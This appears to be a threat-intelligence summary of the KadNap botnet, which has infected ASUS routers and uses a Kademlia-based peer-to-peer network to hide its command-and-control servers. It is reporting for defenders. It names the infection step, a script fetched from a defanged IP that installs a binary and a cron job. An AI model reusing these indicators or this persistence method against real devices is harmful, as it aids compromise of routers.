KadNap is a newly discovered botnet that has infected roughly 14,000 ASUS routers and other edge devices, forming a peer-to-peer network that uses a custom Kademlia-based DHT to hide its command-and-control infrastructure. Researchers at Black Lotus Labs link KadNap to the Doppelganger proxy service, note heavy infection concentration in the United States, and report that Lumen has blocked traffic to the botnetβs control infrastructure on its network. #KadNap #ASUS
Keypoints
- KadNap has grown to about 14,000 infected edge devices since August 2025.
- The botnet uses a modified Kademlia DHT to decentralize C2 communications and evade detection.
- Infections begin with aic.sh downloaded from 212.104.141[.]140, which installs an ELF βkadβ binary and a cron job that runs every 55 minutes.
- Nearly half of the network links to ASUS-dedicated C2 infrastructure, and 60% of infected devices are in the United States.
- KadNap is tied to the Doppelganger proxy service (a Faceless rebrand) that monetizes access for DDoS and credential-stuffing, and Lumen has blocked related traffic on its network.